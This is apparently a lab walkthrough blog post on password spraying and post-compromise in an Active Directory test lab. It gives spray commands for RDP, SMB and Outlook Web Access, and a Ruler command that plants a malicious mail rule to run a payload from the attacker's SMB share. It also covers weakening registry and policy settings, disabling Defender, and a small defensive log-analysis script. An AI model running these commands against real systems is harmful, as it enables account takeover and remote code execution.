One form of brute forcing is called "Password Spraying". This form of attack is somewhat the inverse of the traditional form of brute forcing. Instead of using a few or even one username with a wordlist for potential passwords, password spraying makes use of a list of usernames with a few choice passwords.
For the following demos, the valid credentials found will be thenoob:Winter2019. However, a list of accounts was added to my Active Directory lab environment (check out the Laboratorio de Computación post for my testing lab setup), and as such the username list (plus the added user: thenoob) was used in these attacks.
Also, some considerations when using any of these tools, dependent on the situation:
- if possible, verify the Account Lockout Policy for the given service/application
- throttle attacks to "blend in" with natural flow of network traffic
- are there password complexity requirements in place? 2FA/MFA implemented?
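As an added, defender-side illustration (not part of the original post), the following Python flags the pattern the considerations above hint at: many distinct usernames failing from one source in a short window, which is the signature of a spray rather than a single-account brute force. The CSV log format and the 192.0.2.x addresses are constructed for the example.

```python
"""Flag password-spray behaviour in failed-logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real lab data: "timestamp,source_ip,username,result"
SAMPLE_LOG = """\
2019-06-01T09:00:01,192.0.2.10,alice,FAIL
2019-06-01T09:00:02,192.0.2.10,bob,FAIL
2019-06-01T09:00:03,192.0.2.10,carol,FAIL
2019-06-01T09:00:04,192.0.2.10,dave,FAIL
2019-06-01T09:00:05,192.0.2.10,erin,FAIL
2019-06-01T09:00:06,192.0.2.10,thenoob,SUCCESS
2019-06-01T09:05:00,192.0.2.20,alice,FAIL
2019-06-01T09:06:00,192.0.2.20,alice,SUCCESS
"""

def parse_events(text):
    events = []
    for line in text.splitlines():
        ts, src, user, result = line.strip().split(",")
        events.append((datetime.fromisoformat(ts), src, user, result))
    return events

def find_spray_sources(events, window=timedelta(minutes=30), min_users=5):
    """Return {source_ip: sorted usernames} for sources whose failures hit at
    least `min_users` distinct accounts inside `window`. A spray is wide (many
    users) and shallow (few tries each), so distinct users is the signal."""
    by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "FAIL":
            by_src[src].append((ts, user))
    flagged = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0  # sliding window over time-ordered failures
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                flagged[src] = sorted(users)
                break
    return flagged

def successes_after_spray(events, flagged):
    """Successful logons from flagged sources: the credentials the spray found."""
    return sorted((src, user) for _, src, user, result in events
                  if result == "SUCCESS" and src in flagged)
```

The second source (192.0.2.20) fails only against one account and is not flagged, which is the distinction a lockout-based alert alone would miss.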
So let's get to it!!!
RDP → RDPassSpray
The RDPassSpray tool allows attackers to attempt to log in using the Remote Desktop Protocol (RDP). When fed a username or list of usernames along with a password or list of passwords, this tool will attempt to log in using xfreerdp.
python3 /opt/RDPassSpray/RDPassSpray.py -U users.txt -p Winter2019 -d noob.local -t 10.10.10.13
SMB → CrackMapExec
crackmapexec smb 10.10.10.13 -u ./users.txt -p Winter2019
OWA → MailSniper
One of the modules within the MailSniper tool allows attackers to password spray. This .ps1 script works in a similar fashion to the other tools mentioned above, but attacks an Outlook Web Access page hosted by an Exchange server. The MailSniper Field Manual can be used to review the various MailSniper functions.
Invoke-PasswordSprayOWA -ExchHostname xchange -userlist .\users.txt -password Winter2019
OWA Round 2 → Atomizer
Another one of Byt3bl33d3r's tools, Atomizer of the Spraying Toolkit, can also attack OWA. The cool thing that drew my attention to this tool is the built in functionality to utilize Slack webhooks to notify of successfully found credentials. This capability helps build onto the Slack workspace that I've been building as seen back in two previous posts (Slacking off with sqlmap and Shout-out to the Slack Shellbot).
/opt/SprayingToolkit/atomizer.py owa xchange passwords.txt users.txt -i 0:45:00 --slack https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX
Note: in the above command, the /etc/hosts file was edited to include the address of the Exchange server (reference this post for current lab configuration)
Once credentials are found and the --slack argument is used, the app notifies the channel it is a part of.
Honorable Mention → Ruler
I found a few different posts (1, 2, and 3) that made me really want to try out Ruler in my lab. However, since the servers/apps were all updated, some of the awesome features of Ruler weren't effective anymore. I was able to password spray successfully with it.
But when attempting to create a malicious rule/form to get a reverse shell, or fire off an executable of my choosing, I finally figured out that Outlook stopped trusting "rule actions that can start applications/macros" (ref).
Side Quests to Achieve a Ruler Shell
So I really wanted to get Ruler to work in my lab and went down a quick little rabbit hole trying to figure out some of the needed configurations for it to work. For the system I was attacking I needed to make an edit to the Registry, as suggested in this post:
reg add "HKCU\Software\Microsoft\Office\16.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d "1" /f
As the entry name suggests, this allows for unsafe rules in Outlook.
Next, I needed to allow my target system to access the SMB share being hosted from my attacking machine. Normally when people post about transferring files between Kali and Windows, they reference the usage of Impacket's smbserver.py, with the command being something like this:
python /opt/impacket/examples/smbserver.py rulez /root/ruler-demo
However, with recent patches/updates, Windows no longer ships with SMBv1 enabled by default, so the -smb2support flag may need to be used. Also with more patches/updates, Windows no longer enables "Guest access in SMB". This called for a quick edit to the Group Policy on the target system to "Enable insecure guest logons":
So now the command should look like this:
python /opt/impacket/examples/smbserver.py rulez /root/ruler-demo -smb2support
Or alternatively, the Group Policy edit can be skipped if credentials are supplied to the command:
python /opt/impacket/examples/smbserver.py -username masternoob -password 'Passw0rd!' rulez /root/ruler-demo -smb2support
Note: since the command includes valid credentials for that user, no password prompt will appear when accessing the share, which is what the Ruler exploit needed in order to work
Back to the Main Quest: Ruler Shell
Now with the quick modifications to get setup in place, here's a quick demo of the sweet shell being popped using Ruler. A Covenant PowerShell grunt (ruler_grunt.bat) was staged in the rulez share being hosted on my attacking system.
To kick off the rule and "popashell" I executed the following command:
/opt/ruler/ruler -k --url https://xchange/autodiscover/autodiscover.xml --domain noob --email email@example.com --username thenoob --password Winter2019 --verbose add --location "\\\\10.10.10.133\\rulez\\ruler_grunt.exe" --trigger "popashell" --name maliciousrule --send --subject popashell
Note: an updated Windows Defender should flag Covenant grunts as malware, so for this demo Defender was turned off; I do plan on looking at Donut hopefully in the near future to play around with obfuscating the grunts
I came back to edit this post to include this tool I came across. I'll admit it's not something that would fit in the category of "Password Spraying" but I think it'd be useful once valid admin credentials are found, possibly using one of the above mentioned methods. Spraykatz is described as:
"a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments. It simply tries to procdump machines and parse dumps remotely in order to avoid detections by antivirus software as much as possible."